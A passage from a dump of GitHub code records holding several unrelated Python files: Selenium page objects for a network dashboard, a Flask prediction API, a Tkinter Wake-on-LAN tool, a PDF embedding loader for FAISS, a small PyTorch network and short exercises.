athenataf.lib.functionality.page.switch.SwitchDhcpPage import SwitchDhcpPage\nfrom athenataf.lib.functionality.page.monitoring.MonitoringPage import MonitoringPage\nfrom athenataf.lib.functionality.page.monitoring.MonitoringAccessPointPage import MonitoringAccessPointPage\nfrom athenataf.lib.functionality.page.monitoring.MonitoringSwitchesPage import MonitoringSwitchesPage\nfrom athenataf.lib.functionality.page.monitoring.MonitoringClientPage import MonitoringClientPage\nfrom athenataf.lib.functionality.page.monitoring.MonitoringWidsPage import MonitoringWidsPage\nfrom athenataf.lib.functionality.page.monitoring.MonitoringEventLogsPage import MonitoringEventLogsPage\nfrom athenataf.lib.functionality.page.monitoring.MonitoringNotificationPage import MonitoringNotificationPage\n\nimport time\n\nclass LeftPanel(WebPage):\n def __init__(self, test, browser, config):\n WebPage.__init__(self, \"DashboardLeftpanel\", test, browser, config)\n self.test.assertPageLoaded(self)\n\n def isPageLoaded(self):\n if self.monitoring:\n return True \n else:\n return False \n \n def goto_configuration_page(self):\n self.configuration.click()\n \n def go_to_configuration(self):\n self.configuration.click()\n self.buy_time()\n return AllGroupPage(self.test, self.browser, self.config)\n \n def go_to_security(self):\n time.sleep(4)\n self.security_menu.click()\n if self.save_pop_up:\n self.save_pop_up.click()\n self.security_menu.click()\n return SecurityPage(self.test, self.browser, self.config)\n\n def go_to_access_points(self):\n self.access_points_menu.click()\n self.buy_time()\n return AccessPointsPage(self.test, self.browser, self.config)\n \n def go_to_vpn(self):\n time.sleep(4)\n self.vpn_menu.click()\n time.sleep(4)\n self.vpn_menu.click()\n if self.save_pop_up:\n self.save_pop_up.click()\n self.vpn_menu.click()\n return VpnPage(self.test, self.browser, self.config)\n \n def go_to_network_page(self):\n self.configuration.click()\n return NetworkPage(self.test, self.browser, self.config)\n \n def go_to_services(self):\n time.sleep(4)\n self.services_menu.click()\n if self.save_pop_up:\n self.save_pop_up.click()\n self.services_menu.click() \n return ServicesPage(self.test, self.browser, self.config)\n\n def go_to_rf_page(self):\n time.sleep(4)\n time.sleep(7)\n self.rf_menu.click()\n time.sleep(7)\n self.rf_menu.click()\n return RfPage(self.test, self.browser, self.config)\n \n def go_to_dhcp_page(self):\n time.sleep(4)\n self.dhcp_menu.click()\n if self.save_pop_up:\n self.save_pop_up.click()\n self.dhcp_menu.click() \n return DhcpPage(self.test, self.browser, self.config)\n\n def goto_monitoringPage(self):\n self.monitoring.click()\n self.buy_time()\n return MonitoringPage(self.test, self.browser, self.config)\n\n def go_to_monitoring_access_page(self):\n self.monitoring_access_points.click()\n self.buy_time()\n return MonitoringAccessPointPage(self.test, self.browser, self.config)\n\n def go_to_monitoring_clients_page(self):\n self.monitoring_clients.click()\n self.buy_time()\n return MonitoringClientPage(self.test, self.browser, self.config)\n\n def goto_monitoring_notification_page(self):\n self.go_to_monitoring_page()\n self.monitoring_notifications.click()\n time.sleep(2)\n return MonitoringNotificationPage(self.test, self.browser, self.config)\n \n def go_to_monitoring_notification_page(self):\n self.monitoring_notifications.click()\n \n def go_to_monitoring_wids(self):\n self.buy_time()\n self.monitoring_wids.click()\n self.buy_time()\n return MonitoringWidsPage(self.test, self.browser, self.config)\n \n def go_to_wids_page(self):\n time.sleep(4)\n self.wids_menu.click()\n if self.save_pop_up:\n self.save_pop_up.click()\n self.wids_menu.click()\n return WidsPage(self.test, self.browser, self.config)\n\n def go_to_system_page(self):\n self.system_menu.click()\n\n return SystemPage(self.test, self.browser, self.config)\n \n def go_to_maintenance(self):\n self.maintenance.click()\n return FirmWarePage(self.test, self.browser, self.config)\n \n def go_to_user_management(self):\n time.sleep(5)\n self.maintenance.click()\n self.buy_time()\n self.user_management.click()\n self.buy_time()\n return UserManagementPage(self.test, self.browser, self.config)\n\n def go_to_monitoring_page(self):\n self.buy_time()\n self.monitoring.click()\n self.buy_time()\n return MonitoringPage(self.test, self.browser, self.config)\n\n def go_to_monitoring_access_points(self):\n self.monitoring_access_points.click()\n self.buy_time()\n return MonitoringAccessPointPage(self.test, self.browser, self.config)\n \n def go_to_monitoring_clients_page(self):\n self.monitoring_clients.click()\n self.buy_time()\n return MonitoringClientPage(self.test, self.browser, self.config)\n\n def goto_monitoring_notification_page(self):\n self.go_to_monitoring_page()\n self.monitoring_notifications.click()\n time.sleep(2)\n return MonitoringNotificationPage(self.test, self.browser, self.config)\n \n \n def go_to_monitoring_event_log_page(self):\n self.monitoring_event_log.click()\n return MonitoringEventLogsPage(self.test, self.browser, self.config)\n\n \n \n \n def go_to_monitoring_clients(self):\n self.monitoring_clients.click()\n \n def go_to_monitoring_wids(self):\n self.monitoring_wids.click()\n \n def go_to_monitoring_event_log(self):\n self.monitoring_event_log.click()\n \n def go_to_monitoring_notifications(self):\n self.monitoring_notifications.click()\n\n \n def go_to_monitoring_wids_page(self):\n self.monitoring_wids.click()\n self.buy_time()\n return MonitoringWidsPage(self.test, self.browser, self.config)\n\n \n def buy_time(self):\n time.sleep(8)\n\n def assert_delta_config_icon(self):\n import traceback\n # self.buy_time()\n import time\n time.sleep(120)\n self.slider_menu_icon.click()\n if self.expand_plus_button:\n self.expand_plus_button.click()\n else:\n if self.delta_config_icon:\n raise AssertionError(\"Repeated delta config has been occured.Traceback: %s \" %traceback.format_exc())\n self.slider_menu_icon.click()\n\n def go_to_subscription_keys(self):\n self.buy_time()\n self.maintenance.click()\n self.buy_time()\n self.maintenance_subscription_keys.click()\n self.buy_time()\n return SubscriptionKeysPage(self.test, self.browser, self.config)\n \n def go_to_device_management(self):\n self.buy_time()\n self.maintenance.click()\n self.buy_time()\n self.maintenance_device_management.click()\n self.buy_time()\n return DeviceManagementPage(self.test, self.browser, self.config)\n \n def go_to_switch_configuration(self):\n self.switch_configuration.click()\n return AllGroupPage(self.test, self.browser, self.config)\n \n def go_to_switch_configuration_ports(self):\n self.buy_time()\n self.switch_configuration.click()\n self.buy_time()\n self.ports.click()\n self.buy_time()\n return PortsPage(self.test, self.browser, self.config)\n \n def go_to_switch_configuration_vlans(self):\n self.buy_time()\n self.switch_configuration.click()\n self.buy_time()\n self.vlans.click()\n self.buy_time()\n return SwitchVlansPage(self.test, self.browser, self.config)\n \n def go_to_switch_configuration_system(self):\n self.buy_time()\n self.switch_configuration.click()\n self.buy_time()\n self.system.click()\n self.buy_time()\n return SwitchSystemPage(self.test, self.browser, self.config)\n \n def go_to_reports(self):\n self.reports.click()\n return ReportsNetworkPage(self.test, self.browser, self.config)\n \n def go_to_reports_network(self):\n self.buy_time()\n self.reports.click()\n self.buy_time()\n self.reports_network.click()\n return ReportsNetworkPage(self.test, self.browser, self.config)\n \n def go_to_reports_security(self):\n self.buy_time()\n self.reports.click()\n self.buy_time()\n self.reports_security.click()\n return ReportsSecurityPage(self.test, self.browser, self.config)\n \n def go_to_maintenance_Firmware_page(self):\n self.maintenance.click()\n self.buy_time()\n self.maintenance_firmware.click()\n self.buy_time()\n return FirmWarePage(self.test, self.browser, self.config)\n \n def go_to_reports_pci_compliance(self):\n self.buy_time()\n self.reports.click()\n self.buy_time()\n self.reports_pci_compliance.click()\n return ReportsPciCompliancePage(self.test, self.browser, self.config)\n \n def go_to_switch_configuration_switch(self):\n self.buy_time()\n self.switch_configuration.click()\n self.buy_time()\n self.switches.click()\n self.buy_time()\n return SwitchesPage(self.test, self.browser, self.config)\n\n def go_to_switch_configuration_dhcp_pools(self):\n self.buy_time()\n self.switch_configuration.click()\n self.buy_time()\n self.dhcp_pools.click()\n self.buy_time()\n return SwitchDhcpPage(self.test, self.browser, self.config)\n\n def go_to_reports_page(self):\n self.reports.click()\n\n def go_to_monitoring_switches_page(self):\n self.buy_time()\n self.monitoring.click()\n if self.SwitchesSubMenu:\n self.SwitchesSubMenu.click()\n return MonitoringSwitchesPage(self.test, self.browser, self.config)\n \n def go_to_monitoring_switches_page(self):\n self.buy_time()\n self.monitoring.click() \n if self.SwitchesSubMenu:\n self.SwitchesSubMenu.click()\n return MonitoringSwitchesPage(self.test, self.browser, self.config)","repo_name":"cash2one/reautomation_handoff","sub_path":"athena_automation/athenataf/lib/functionality/page/common/LeftPanel.py","file_name":"LeftPanel.py","file_ext":"py","file_size_in_byte":12580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13723170784","text":"class Name:\n def __get__(self, instance, owner=None):\n print(f'__get__,instance is {instance},owner is {owner}')\n return \"peter\"\n\nclass A:\n name=Name()\n # def __init__(self) -> None:\n # self.name=Name()\n\no=A()\n\n# print(A.name)\nName.__set__=lambda x,y,z:None\no.name=\"Bob\"\nprint(o.name)","repo_name":"minikiller/spider-project","sub_path":"des.py","file_name":"des.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8027437421","text":"from flask import Flask, request\nfrom flask_restful import Resource, Api\nfrom predykcja_meczy import predykacja_meczy_wynik\nfrom flask_cors import CORS\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/prediction/*\": {\"origins\": \"*\"}})\napi = Api(app)\n\nclass HelloWorld(Resource):\n def get(self):\n return {'about' : 'Hello World'}\n \n def post(self):\n some_json = request.get_json()\n return {'you sent' : some_json}, 201\n \nclass Multi(Resource):\n def get(self, num):\n return {'result' : num*10}\n\nclass Prediction(Resource):\n def get(self, data):\n data = str(data)\n print(len(data))\n if len(data) == 5:\n data = '0'+data\n print(data)\n a = data[0:2]\n print(a)\n b = data[2:4]\n print(b)\n c = data[4:]\n print(c)\n data = a+'/'+b+'/'+c\n print(data)\n return {'result' : predykacja_meczy_wynik(data)}\n #return(data)\n \n \n \napi.add_resource(HelloWorld, '/')\napi.add_resource(Multi, '/multi/')\napi.add_resource(Prediction, '/prediction/')\n\nif __name__ == '__main__':\n app.run(debug=False)\n\n","repo_name":"Sinon2025/NBA-Prediction-Web-Application","sub_path":"Prediction Server/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"17888396290","text":"from wol import *\nfrom tkinter import *\nimport time\nimport pickle\nfrom tkinter import messagebox\nimport datetime\n\nclass WakeOnLanGraphical():\n\n\tdef __init__(self):\n\t\t\"\"\" Fenetre principale\"\"\"\n\n\t\tself.Ip = \"\"\n\t\tself.Mac = \"\"\n\t\tself.Port = \"\"\n\n\t\tself.ListLog = []\n\n\t\ttry:\n\t\t\tself.GetConf()\n\n\t\texcept:\n\n\t\t\tpass\n\n\t\ttry:\n\t\t\tself.GetLog()\n\n\t\texcept:\n\n\t\t\tpass\n\n\n\t\tself.window = Tk()\n\t\tself.window.title('Wake On Lan')\n\t\tself.window.geometry(\"350x400\")\n\t\tself.window.config(bg='white')\n\n\t\tself.window.iconbitmap(default='image/logo.ico')\n\n\t\t# Photo\n\t\tself.image = PhotoImage(file=\"image/logo.png\")\n\t\tself.image_verte = PhotoImage(file='image/logo_vert2.png')\n\n\t\tself.canvas = Canvas(self.window, width=300, height=300, bg='white', bd=0, highlightthickness=0,)\n\t\tself.click = self.canvas.create_image(150, 150, image=self.image, state=NORMAL)\n\n\n\t\tself.canvas.tag_bind(self.click, \"\", self.WakeUpButton)\n\n\n\t\tself.canvas.pack()\n\n\t\t# Menu\n\t\tmenu_bar = Menu(self.window)\n\n\t\tmenu_bar.add_command(label='Configuration', command = self.ConfWol)\n\t\tmenu_bar.add_command(label='Log', command =self.Log)\n\t\tmenu_bar.add_command(label='A propos', command = self.About)\n\n\n\t\tself.window.config(menu=menu_bar)\n\n\n\t\tself.window.mainloop()\n\n\n\n\tdef Gif(self):\n\n\t\t#NbrImage = 29\n\t\tNbrImage = 25\n\t\ti = 1\n\t\t\n\t\twhile i != NbrImage + 1:\n\n\t\t\t#img = PhotoImage(file=\"image/gif - copie/{}.png\".format(i)) \n\t\t\timg = PhotoImage(file=\"image/gif/{}.png\".format(i)) \n\n\t\t\tself.canvas.itemconfig(self.click, image=img)\n\t\t\tself.window.update()\n\t\t\ti += 1\n\n\tdef WakeUpButton(self, arg):\n\t\t\"\"\"Fonction appeler au click du bouton de reveil\"\"\"\n\n\t\tself.Gif()\n\t\ttime.sleep(0.2)\n\t\tself.canvas.itemconfig(self.click, image=self.image)\n\n\t\tCheck = self.CheckData(self.Ip, self.Mac, self.Port)\n\t\tprint('Resultat du check data : {}'.format(Check))\n\t\t\n\t\t#Check = True # A del une fois CheckData fonctionnel\n\n\t\tif Check == True:\n\n\t\t\tprint('Juste avant d envoyer : {}, {}, {}'.format(self.Ip, self.Mac, self.Port))\n\t\t\tWol(self.Ip, self.Mac, self.Port)\n\n\n\t\t\tself.AddLog(self.Ip, self.Mac, self.Port, True)\n\n\t\t\tprint('Paquet magique envoyée')\n\n\t\telse:\n\n\t\t\tmessagebox.showinfo(\"Impossible d'envoyée le paquet\", \"Error {} : {}\".format(Check[1], Check[2]))\n\t\t\tprint(\"Impossible d'envoyée le paquet veuillez verifiez les data (Error {} : {})\".format(Check[1], Check[2]))\n\n\t\t\tself.AddLog(self.Ip, self.Mac, self.Port, False, [Check[1], Check[2]])\n\n\t\tprint(self.Ip, self.Mac, self.Port)\n\n\n\tdef CheckData(self, Ip, Mac='', Port=''):\n\n\n\t\tif Ip == '':\n\n\t\t\treturn [False, 1, 'Champ adresse IP vide']\n\n\t\tif Mac == '':\n\n\t\t\treturn [False, 2, 'Champ addresse Mac vide']\n\n\t\tif Port == '':\n\n\t\t\treturn [False, 3, 'Champ port destination vide']\n\n\n\t\telse:\n\t\t\t# Check IP\n\t\t\ttry:\n\n\t\t\t\tIpSplit = Ip.split('.')\n\n\t\t\t\tfor element in IpSplit:\n\n\t\t\t\t\tIpSplit[IpSplit.index(element)] = int(element)\n\t\t\t\n\n\t\t\t\tif len(IpSplit) != 4:\n\n\t\t\t\t\tIpCheck = False\n\n\t\t\t\telif IpSplit[0] > 254 or IpSplit[0] < 1:\n\n\t\t\t\t\tIpCheck = False\n\n\t\t\t\telif IpSplit[1] > 254 or IpSplit[1] < 1:\n\n\t\t\t\t\tIpCheck = False\n\n\t\t\t\telif IpSplit[2] > 254 or IpSplit[2] < 1:\n\n\t\t\t\t\tIpCheck = False\n\n\t\t\t\telif IpSplit[3] > 254 or IpSplit[3] < 1:\n\n\t\t\t\t\tIpCheck = False\n\n\t\t\t\telse:\n\n\t\t\t\t\tIpCheck = True\n\n\t\t\texcept:\n\n\t\t\t\tif '.' in Ip:\n\n\t\t\t\t\tIpCheck = True\n\n\t\t\t\telse:\n\t\t\t\t\tIpCheck = False\n\n\t\t\n\n\t\t\t# Check Mac\n\n\t\t\tAlphabet = ['A', 'B', 'C', 'D', 'E', 'F', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', '-']\n\t\t\tCheckerMac = []\n\t\t\ttry:\n\n\t\t\t\tLenMac = len(Mac)\n\n\t\t\t\tif LenMac == 12 or LenMac == 17:\n\n\t\t\t\t\tfor element in Mac:\n\n\t\t\t\t\t\tif element.upper() in Alphabet:\n\n\t\t\t\t\t\t\tCheckerMac.append(True)\n\n\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\tCheckerMac.append(False)\n\n\t\t\t\t\tif False in CheckerMac:\n\n\t\t\t\t\t\tMacCheck = False\n\n\t\t\t\t\telse:\n\n\t\t\t\t\t\tMacCheck = True\n\n\t\t\t\telse:\n\n\t\t\t\t\tMacCheck = False\n\n\n\t\t\texcept:\n\n\t\t\t\tMacCheck = False\n\n\t\t\t# Check Port\n\t\t\ttry:\n\n\t\t\t\tif int(Port) == 9 or int(port) == 7:\n\n\t\t\t\t\tPortCheck = True\n\n\t\t\t\telse:\n\t\t\t\t\tPortCheck = False\n\n\t\t\texcept:\n\n\t\t\t\tPortCheck = False\n\n\n\t\t\tCheck = [IpCheck, MacCheck, PortCheck]\n\n\t\t\tif False in Check:\n\n\t\t\t\tError = Check.index(False)\n\n\t\t\t\t# Ip invalide\n\t\t\t\tif Error == 0:\n\n\t\t\t\t\treturn [False, 4, 'Adresse IP incorrecte']\n\n\t\t\t\t# Mac invalide\n\t\t\t\tif Error == 1:\n\n\t\t\t\t\treturn [False, 5, 'Adresse MAC incorrecte']\n\n\t\t\t\t# Port invalide\n\t\t\t\tif Error == 2:\n\n\t\t\t\t\treturn [False, 6, 'Port incorrecte']\n\n\n\t\t\telse:\n\n\t\t\t\treturn True\n\n\n\n\n\tdef ConfWol(self):\n\t\t\"\"\"Fonction appeler au click de la configuration du logiciel\"\"\"\n\n\t\tdef SaveParams(event=False):\n\t\t\t\"\"\" Fonction d'enregistrement des parametres de configuration\"\"\"\n\n\t\t\tself.Ip = IpEntry.get()\n\t\t\tself.Mac = MacEntry.get()\n\t\t\tself.Port = PortEntry.get()\n\n\t\t\tself.SetConf(self.Ip, self.Mac, self.Port)\n\n\t\t\tmain.destroy()\n\n\t\t\tprint(self.Ip, self.Mac, self.Port)\n\n\t\tdef Destroy(event=False):\n\n\t\t\tmain.destroy()\n\n\n\n\t\tmain = Tk()\n\t\tmain.title('Configuration Wake On Lan')\n\t\tmain.geometry(\"230x230\")\n\t\tmain.config(bg='white')\n\n\t\tparametres = Frame(main, bg='white')\n\n\t\t# @IP\n\t\tIpText = Label(parametres, text=\"Adresse IP :\", bg='white')\n\t\tIpText.grid(row=1, column=1)\n\n\t\tIpEntry = Entry(parametres)\n\t\tIpEntry.insert(END, self.Ip)\n\t\tIpEntry.grid(row=1, column=2)\n\n\t\t# @MAC\n\t\tMacText = Label(parametres, text=\"Adresse MAC :\", bg='white')\n\t\tMacText.grid(row=2, column=1)\n\n\t\tMacEntry = Entry(parametres)\n\t\tMacEntry.insert(END, self.Mac)\n\t\tMacEntry.grid(row=2, column=2)\n\n\t\t# Port\n\t\tPortText = Label(parametres, text=\"Port :\", bg='white')\n\t\tPortText.grid(row=3, column=1)\n\n\t\tPortEntry = Entry(parametres)\n\t\tPortEntry.insert(END, self.Port)\n\t\tPortEntry.grid(row=3, column=2)\n\n\t\t# Touche clavier\n\t\tmain.bind('', SaveParams) # Entrer enregistre les parametres\n\t\tmain.bind('', Destroy) # Echappe quitte la fenetre sans enregistrer les modification\n\n\t\tparametres.pack()\n\n\t\t# Valider\n\t\tSubmitButton = Button(main, text='Valider', command=SaveParams)\n\t\tSubmitButton.pack()\n\n\t\t\n\n\n\t\n\tdef GetConf(self):\n\n\t\twith open('data', 'rb') as Fichier:\n\n\t\t\tmon_depickler = pickle.Unpickler(Fichier)\n\t\t\tdata = mon_depickler.load()\n\n\t\tprint(\"Element récuperer dans le fichier data : {}\".format(data))\n\n\t\tself.Ip = data[0]\n\t\tself.Mac = data[1]\n\t\tself.Port = data[2]\n\n\n\tdef SetConf(self, Ip, Mac, Port):\n\n\n\t\tconf = [Ip, Mac, Port]\n\n\t\twith open('data', 'wb') as Fichier:\n\n\t\t\tmon_pickle = pickle.Pickler(Fichier)\n\t\t\tmon_pickle.dump(conf)\n\n\n\tdef About(self):\n\n\t\tmain = Tk()\n\t\tmain.title('A propos')\n\t\tmain.geometry(\"300x300\")\n\t\tmain.config(bg='white')\n\n\t\tText = Label(main, text=\"Logiciel libre de droit, crée par Alban Cipre en 2020\")\n\t\tText.grid()\n\n\t\tVersion = Label(main, text=\"Version : 1\")\n\t\tVersion.grid()\n\n\t\tContact = Label(main, text=\"Contact : alban@cipre.com\")\n\t\tContact.grid()\n\n\tdef Log(self):\n\n\t\tmain = Tk()\n\t\tmain.title('Log')\n\t\tmain.geometry(\"300x300\")\n\t\tmain.config(bg='white')\n\n\t\tfor element in self.ListLog:\n\n\t\t\tText = Label(main, text=element)\n\t\t\tText.grid()\n\n\tdef AddLog(self, Ip, Mac, Port, state, CodeError=False):\n\n\t\theure = datetime.datetime.now()\n\n\t\tif state == True:\n\n\t\t\tself.ListLog.append([\"[{}/{}/{} {}:{}] : Paquet envoyer : Ip : {}, Mac : {}, Port : {}\".format(heure.day, heure.month, heure.year, heure.hour, heure.minute, Ip, Mac, Port)])\n\n\t\telse:\n\n\t\t\tself.ListLog.append([\"[{}/{}/{} {}:{}] : Tentative d'envoi avec erreur : Ip : {}, Mac : {}, Port : {} [Error : {} {}]\".format(heure.day, heure.month, heure.year, heure.hour, heure.minute, Ip, Mac, Port, CodeError[0], CodeError[1])])\n\n\t\tself.SetLog(self.ListLog)\n\n\tdef GetLog(self):\n\n\t\twith open('log', 'rb') as Fichier:\n\n\t\t\tmon_depickler = pickle.Unpickler(Fichier)\n\t\t\tdata = mon_depickler.load()\n\n\t\tprint(\"Element récuperer dans le fichier log : {}\".format(data))\n\n\t\tself.ListLog = data\n\n\n\tdef SetLog(self, log):\n\n\n\t\twith open('log', 'wb') as Fichier:\n\n\t\t\tmon_pickle = pickle.Pickler(Fichier)\n\t\t\tmon_pickle.dump(log)\n\n\n\nif __name__ == '__main__':\n\n\tmain = WakeOnLanGraphical()\n\n","repo_name":"scorpix06/simple-python-wake-on-lan","sub_path":"main.pyw","file_name":"main.pyw","file_ext":"pyw","file_size_in_byte":7789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"112523905","text":"from flask import Blueprint, render_template, redirect, url_for, session\n\n# homepage blueprint definition\nHomepage = Blueprint(\n \"Homepage\",\n __name__,\n static_folder=\"static\",\n static_url_path=\"/\",\n template_folder=\"templates\",\n)\n\n\n# Routes\n@Homepage.route(\"/\")\ndef index():\n try:\n user = session[\"user\"]\n except:\n user = \"\"\n return render_template(\"homepage.html\", user=user)\n","repo_name":"noam-raanan-bgu/team9","sub_path":"pages/homepage/homepage.py","file_name":"homepage.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72596893926","text":"from email import header\nfrom turtle import pd\nfrom langchain.document_loaders import PyPDFLoader\nimport os\nfrom haystack.document_stores import FAISSDocumentStore\nfrom haystack.nodes import EmbeddingRetriever\nfrom tqdm import tqdm\nimport re\nfrom langchain.text_splitter import CharacterTextSplitter\nimport pdfplumber\n\nimport PyPDF4\nimport fitz\nfrom haystack import Document\n\n\n\ndef getAllFileNames(directory):\n\n return os.listdir(directory)\n\ndef init_store():\n \n try:\n sp_store = FAISSDocumentStore.load(index_path=\"./sharepoint/sp_faiss_index.faiss\")\n sp_loaded = True\n except:\n sp_store = FAISSDocumentStore(\n sql_url=\"sqlite:///sharepoint/sp_document_store.db\",\n similarity=\"cosine\",\n embedding_dim=768,\n duplicate_documents='overwrite'\n )\n sp_loaded = False\n\n return sp_store, sp_loaded\n\ndef parseFilesAndEmbedDocuments(directory, filenames, sp_document_store, sp_retriever):\n \n docs = []\n doc_num = 0\n for filename in tqdm(filenames, desc=\"Processing PDF Files: \"):\n path = fr\"{directory}{filename}\"\n\n type = path.split(\".\")[-1]\n print(\"==================\\n\",filename)\n\n # We are only processing PDF files\n if type == \"pdf\":\n all_text = test_splitter(path)\n if all_text is None:\n continue\n \n for text in all_text:\n \n if len(text) == 1:\n header = \"\"\n doc_content = text[0]\n else:\n header = text[0]\n doc_content = text[0].strip() + \" - \" + text[1]\n \n if doc_content.strip() == \"\" or len(re.findall(\"[/,:]\", doc_content)) > 30 or len(doc_content) < 50:\n continue\n \n # content = re.sub(r\"[\\n,\\t,•]\", \"\", doc_content)\n doc = Document(\n content= doc_content,\n id= doc_num,\n meta = {\n\n \"filename\" : filename,\n \"header\" : header\n }\n )\n print(\"Doc: \" + doc.content)\n docs.append(doc)\n # print(\"CONTENT: \", doc.content)\n # docs.append(doc)\n doc_num +=1\n print(\"=================\")\n\n print(\"sharepoint documents to add to DB:\", len(docs))\n\n sp_document_store.write_documents(docs)\n sp_document_store.update_embeddings(sp_retriever)\n\n print(\"sharepoint docs added:\", sp_document_store.get_document_count())\n print(\"sharepoint docs embedded:\", sp_document_store.get_embedding_count())\n\n sp_document_store.save(index_path=\"./sharepoint/sp_faiss_index.faiss\")\n\n\ndef test_splitter(file_path):\n \n try:\n with pdfplumber.open(file_path) as pdf: \n\n all_text = []\n \n for page in pdf.pages:\n \n text_type = []\n \n bold_str = \"\"\n norm_str = \"\"\n\n isBolded = False\n \n try:\n page.objects['char']\n except:\n continue\n for char in page.objects['char']:\n \n if char[\"object_type\"] == \"char\" and \"Bold\" in char[\"fontname\"]:\n if (not isBolded):\n text_type.append(norm_str)\n norm_str = \"\"\n all_text.append(text_type)\n text_type = []\n isBolded = True\n bold_str += char['text']\n\n elif char[\"object_type\"] == \"char\" and \"Bold\" not in char[\"fontname\"]:\n if (isBolded):\n text_type.append(bold_str)\n bold_str = \"\"\n isBolded = False\n norm_str += char['text']\n\n text_type.append(norm_str)\n #print(\"----------------\\n\", text_type, \"\\n---------------\")\n all_text.append(text_type)\n\n return all_text\n\n except:\n\n return None\n\ndef main():\n\n test_splitter(r\"/Users/dhoule5/OneDrive - UHG/EIS Artifacts/UnitedHealth Group - File Transfer - Electronic Communication Gateway (ECG).pdf\")\n\n # directory = r\"/Users/dhoule5/OneDrive - UHG/EIS Artifacts/\"\n\n\n # filenames = getAllFileNames(directory)\n\n # print(len(parseFilesAndEmbedDocuments(directory,filenames)))\n \nif __name__ == \"__main__\": \n main()\n\n\n\n\n# def parseFilesAndEmbedDocuments(directory, filenames, sp_document_store, sp_retriever):\n \n# docs = []\n# i = 0\n# for filename in tqdm(filenames, desc=\"Processing PDF Files: \"):\n# path = fr\"{directory}{filename}\"\n\n# type = path.split(\".\")[-1]\n\n# # We are only processing PDF files\n# if type == \"pdf\":\n# try:\n\n# pdfLoader = PyPDFLoader(path)\n# pages = pdfLoader.load_and_split()\n# except:\n# continue\n\n# for page in pages:\n \n# text = re.sub(r\"[\\n,\\t,•]\", \"\", page.page_content)\n \n# id = i\n\n# doc = Document(\n# content= text,\n# id= id,\n# meta = {\n\n# \"filename\" : filename,\n# \"page\" : page.metadata['page']\n\n# }\n# )\n\n# docs.append(doc)\n# i+=1\n \n\n# print(\"sharepoint documents to add to DB:\", len(docs))\n\n# sp_document_store.write_documents(docs)\n# sp_document_store.update_embeddings(sp_retriever)\n\n# print(\"sharepoint docs added:\", sp_document_store.get_document_count())\n# print(\"sharepoint docs embedded:\", sp_document_store.get_embedding_count())\n\n# sp_document_store.save(index_path=\"./sharepoint/sp_faiss_index.faiss\")\n\n\n\n\n","repo_name":"b-castellano/RFP-Retriever","sub_path":"sharepoint/sp_load.py","file_name":"sp_load.py","file_ext":"py","file_size_in_byte":6132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72253693604","text":"#!/usr/bin/env python\n# coding=utf-8\n# pylint: skip-file\n# pylint: disable-all\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 6, 3)\n self.conv2 = nn.Conv2d(6, 16, 3)\n self.fc1 = nn.Linear(16*6*6, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 10)\n\n def forward(self, x):\n x = F.max_pool2d(F.relu(self.conv1(x)), (2,2))\n x = F.max_pool2d(F.relu(self.conv2(x)), 2)\n x = x.view(-1, self.num_flat_features(x))\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return x\n\n def num_flat_features(self, x):\n size = x.size()[1:]\n num_features = 1\n for s in size:\n num_features *= s\n return num_features\n\nnet = Net()\nprint(net)\n\nparam = list(net.parameters())\nprint(len(param))\nprint(param[0].size())\n\ndata = torch.randn(1,1,32,32)\nout = net(data)\nprint(out)\n\nnet.zero_grad()\nout.backward(torch.randn(1,10))\n\nout = net(data)\ntarget = torch.randn(10)\ntarget = target.view(1,-1)\ncriterion = nn.MSELoss()\nloss = criterion(out, target)\nprint(loss)\n\nprint(loss.grad_fn)\n\nnet.zero_grad()\nprint('conv1.bias.grad before backward')\nprint(net.conv1.bias.grad)\nprint('conv1.bias.data before backward')\nprint(net.conv1.bias.data)\n\noptimizer = optim.SGD(net.parameters(), lr=0.01)\n\noptimizer.zero_grad()\nout = net(data)\nloss = criterion(out, target)\nloss.backward()\noptimizer.step()\n\nprint('conv1.bias.grad after backward')\nprint(net.conv1.bias.grad)\nprint('conv1.bias.data after backward')\nprint(net.conv1.bias.data)\n\n","repo_name":"thucgn/pytorch","sub_path":"test/net.py","file_name":"net.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27686336798","text":"class Solution:\n def maxCoins(self, piles: List[int]) -> int:\n piles.sort()\n ans = 0\n i = len(piles)-2\n j = -1\n while(i>j):\n ans+=piles[i]\n j+=1\n i-=2\n return ans\n","repo_name":"NatinaelFekadu/competitive-programing","sub_path":"Maximum Number of Coins You Can Get.py","file_name":"Maximum Number of Coins You Can Get.py","file_ext":"py","file_size_in_byte":241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"27799766031","text":"#!/usr/bin/python3\nimport requests\nimport json\n#define URL\nGETURL= \"http://validate.jsontest.com/\"\ndef main():\n # test data to validate as legal json\n mydata= {\"fruit\":[\"apple\",\"pear\"],\"veg\":[\"carrot\"]}\n ## user json library to convert to legal json, then strip out whitespace\n jsonToValidate =f\"json= {json.dumps(mydata).replace(' ', '')}\"\n # use requests library to send an HTTP GET\n resp= requests.get(f\"{GETURL}?{jsonToValidate}\")\n # strip off JSON response\n # and convert to PYTHONIC LIST / DICT\n respjson= resp.json()\n #display our PYTHONICdata(LIS /DICT)\n print(respjson)\n #just display the value of \"validate\"\n print(f\"IS your jaon 